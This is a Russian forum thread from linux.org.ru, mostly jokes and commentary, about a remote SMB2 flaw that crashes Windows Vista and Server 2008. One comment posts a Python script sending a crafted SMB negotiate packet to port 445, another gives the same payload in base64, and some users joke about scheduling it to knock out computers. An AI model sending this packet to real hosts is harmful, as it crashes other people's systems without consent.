LINUX.ORG.RU
Ответ на: комментарий от yurikoles

>Я ещё не учил это быдлоязычёк.

перепиши эксплоит на лиспе

HighwayStar ★★★★★
()
Ответ на: комментарий от yurikoles

Просто твоё днк забанили в интернете по геному и маске 255.*.*.*.

shahid ★★★★★
()

Да, офигенная дыра, офигенный сплойт. А ещё знаете, машину можно заDDOSить обычным таким ping'ом. Привет, девяностые!

Не знаю, у кого как, а я службу «сервер» отключаю сразу после установки венды.

env ★★☆
()
Ответ на: комментарий от env

> Не знаю, у кого как, а я службу «сервер» отключаю сразу после установки венды.

есть и более гуманные способы самоубийства на ЛОРе. Например, Dimez :)

Woffice
()
Ответ на: комментарий от yurikoles

Я тоже питон не учил, но почему-то понял, что должен делать код без этого: посылать вот такую хрень в 445-й порт (закодировано base64):
AAAAkP9TTUJyAAAAABhTyAAmAAAAAAAAAAAAAP////4AAAAAAG0AAlBDIE5FVFdPUksg
UFJPR1JBTSAxLjAAAkxBTk1BTjEuMAACV2luZG93cyBmb3IgV29ya2dyb3VwcyAzLjFh
AAJMTTEuMlgwMDIAAkxBTk1BTjIuMQACTlQgTE0gMC4xMgACU01CIDIuMDAyAA==

Xenius ★★★★★
()
Ответ на: комментарий от HighwayStar

> такого чтобы аделенно и сразу положить систему, бе з всяких усилий, не было на моей памяти
В OpenBSD недавно было, но исправили в тот же день.

Xenius ★★★★★
()

from socket import socket
from time import sleep
host = "127.0.0.1", 445
buff = (b'\x00\x00\x00\x90\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x53\xc8\x
00\x26\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe\x00\x00\x00\x00\ x
00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\ x
41\x4d\x20\x31\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00\x02\x57\ x
69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\ x
73\x20\x33\x2e\x31\x61\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c\ x
41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\ x
00\x02\x53\x4d\x42\x20\x32\x2e\x30\x30\x32\x00')
s = socket()
s.connect(host)
s.send(buff)
148 << ответ чтоли
s.close()

что я делаю не так????
win7 py3.1

po1s0n
()

Rubén считает что это более серъёзная уязвимость

Today I wake up with an advisory published by Laurent Gaffié where a possible BSOD is announced. The advisory does not provide any technical detail and it is only based on empirical results so it needs to be verified. This is the result of my brief research. Change DoS to Remote Code Execution and Local Privilege Escalation.

yurikoles ★★★
()
Ответ на: комментарий от po1s0n

работает только на висте и 2008м сервере

fv
()

>Короче, надо на главную и тэг "история успеха"

+100500)))

Insomnium ★★★★
()
Ответ на: комментарий от yurikoles

>Rubén считает что это более серъёзная уязвимость

Можно парализовать целый завод.

linux4ever
()

Вспомнился незамысловатый анекдот:

- Слыхал, Вася вчера сервер положил..
- Круто! Он что, хакер?
- Неа, он урод!

К чему я это? Да так, просто..

AX ★★★★★
()
Ответ на: комментарий от Komintern

>да, только эксплойт требовал установленного pulseaudio и работал только локально.

pthread exploit был еще.

dikiy ★★☆☆☆
()

переписал на жабе,
ОЛОЛО теперь можно добавлять в планировщик задания по отстрелу компов

po1s0n
()

На нульче пишут, что в эксплойте ошибка и нужно заменить один байт, тогда жахать сильнее будет.

EmStudio
()
Ответ на: комментарий от EmStudio

> На нульче пишут, что в эксплойте ошибка и нужно заменить один байт, тогда жахать сильнее будет

ну так и где исправление? сообщество ждёт патчей!

Woffice
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.